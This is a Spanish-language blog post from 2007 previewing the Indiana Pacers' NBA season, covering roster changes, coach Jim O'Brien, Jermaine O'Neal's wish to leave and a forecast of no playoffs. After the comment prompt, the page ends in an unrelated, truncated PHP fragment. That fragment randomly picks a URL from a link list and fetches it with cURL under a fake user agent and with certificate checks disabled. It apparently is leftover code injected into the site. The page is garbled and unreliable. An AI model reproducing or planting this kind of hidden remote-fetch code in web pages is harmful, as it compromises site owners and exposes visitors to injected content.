Indiana Pacers: pocos motivos para la esperanza

21 de September de 2007 por Jabho

Dicen en Indiana que en los otros 49 estados se trata simplemente de baloncesto. Los Hoosiers, Larry Bird, Reggie Miller, el Conseco Fieldhouse… Un legado, el de Indiana, para unos Pacers que hoy por hoy no están a la altura.

Durante 15 años los Pacers han sido sinónimo de play-off y han jugado varias finales de conferencia. En la temporada 03-04 el récord de la franquicia fue 61-21. La liga 04-05 la empezaron con la etiqueta de equipo aspirante al anillo y grandes expectativas. Pero la pelea de Auburn Hills marcó esa temporada y el devenir de las siguientes. De aquellos polvos estos lodos, dice el refrán, y tras la pelea ya nada fue igual en Indiana. Dos temporadas de play-off por los pelos y la siguiente, temporada 06-07, se quedaron fuera tras 14 participaciones consecutivas.

Sin resultados deportivos y cansado de problemas extradeportivos, Bird cambió el rumbo de la franquicia en mitad de la temporada pasada. Mandó a Jackson y Harrington a los Warriors a cambio de Dunleavy, Murphy (ambos con altos contratos por varios años) y Diogu. Artest había salido antes y de los participantes en la pelea sólo queda O´Neal, por ahora. Sin embargo los resultados no mejoraron y el año pasado acabaron con un pobre 35-47.

La pretemporada ha sido demasiado tranquila en cuanto a movimientos. Un par de bajas nada significativas y 4 altas que llaman muy poquito la atención: Travis Diener, Stephen Graham, Kareem Rush y Andre Owens. Poca aportación se puede esperar de estas incorporaciones. Diener puede llegar a cumplir como base suplente y Rush es un buen tirador, pero muy poco más. Mal panorama en un equipo cuesta abajo en lo deportivo y cuyo margen de movimiento es muy limitado.

Pero hay un par de rayos de luz en este nublado horizonte. Granger y Diogu han dejado en sus primeros años en la liga destellos de grandes jugadores. En un equipo gris y con bajas expectativas la afición debería reclamar minutos y presencia para ver progresar a estos jugadores. El otro rayo de luz es Jim O´Brien.

O´Brien es un técnico veterano y desde luego no es uno de los grandes de la liga. Dicen que es exigente y que no deja que los directivos interfieran en el vestuario. Pero le gusta el baloncesto rápido, abierto, donde se tira mucho y mucho de lo que se tira es de tres puntos, estilo que gusta a Larry Bird. O´Brien juega a tirar muchos tiros cada partido. Hay partidos en los que los tiros no entran y el juego parece improvisado y sin sentido, pero no es así. Ése es su estilo y con él ha conseguido resultados interesantes, por ejemplo durante su etapa en Boston. En Indiana lo principal es recuperar la química en la plantilla y un estilo de juego con el que se identifique la afición. Éste es el reto para el “experimento O´Brien” (así definió Daimiel su paso por Boston).

La temporada arrancará marcada por las declaraciones de su gran estrella, Jermaine O´Neal, diciendo que quiere irse a los Lakers. O´Neal entiende que el equipo inicia un periodo de reconstrucción y que lo mejor para todos es su salida. Jermaine motivado y sin problemas físicos es uno de los mejores jugadores interiores de la liga. Difícil papeleta para Bird y O´Brien convencer a Jermaine de que se quiera quedar. Difícil pero no imposible. El equipo quizás no está a la altura del que fue aspirante al título hace unos años pero tampoco es tan malo como pareció el año pasado.

El juego exterior estará comandado por Tinsley como director de juego. No se debe sentir incómodo en ritmos rápidos de partido ya que es un base más anotador que director y es justo en estático donde se encuentra con mas dificultades. Como base suplente se intuye que Diener tendrá las oportunidades que no ha tenido en los Magic. Daniels saldrá como escolta. Buen defensor con mas físico que talento. Rush le dará descanso y debería aportar tiro y anotación desde el banco. Los aleros titulares serán Dunleavy y Murphy; ambos son buenos tiradores por lo que les viene muy bien un entrenador que les dé manga ancha a la hora de tirar de 3. Que no se descuiden. La progresión de Granger, Diogu o Williams les podría dejar en el banco. En el puesto de pívot saldrá Jermaine. Como hemos dicho, uno de los mejores de la liga. El equipo gira en torno a él. Que él quiera y pueda jugar a gran nivel será clave para saber a qué puede aspirar el equipo. Foster, defensa y sobretodo rebote, y Harrison darán descanso a O´Neal.

Así que Indiana empezará el año sin ser aspirante ni siquiera a Playoffs. Pero no son una banda. Si el estilo O´Brien cuaja entre la plantilla y la afición, consiguen cambiar la dinámica en la que se metieron tras la famosa pelea y convencen a Jermaine para que crea en el nuevo proyecto, estarán en el buen camino. Si no lo consiguen necesitarán cambios drásticos, tiempo y mucha paciencia. Francamente es difícil. Muy difícil. Pero ya sabemos que en los otros 49 estados se trata sólo de baloncesto.

Probable quinteto: Jamaal Tinley, Marquis Daniels, Mike Dunleavy, Troy Murphy y Jermaine O´neal
Sexto hombre: Danny Granger

 

Pronóstico: Fuera de Playoffs

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>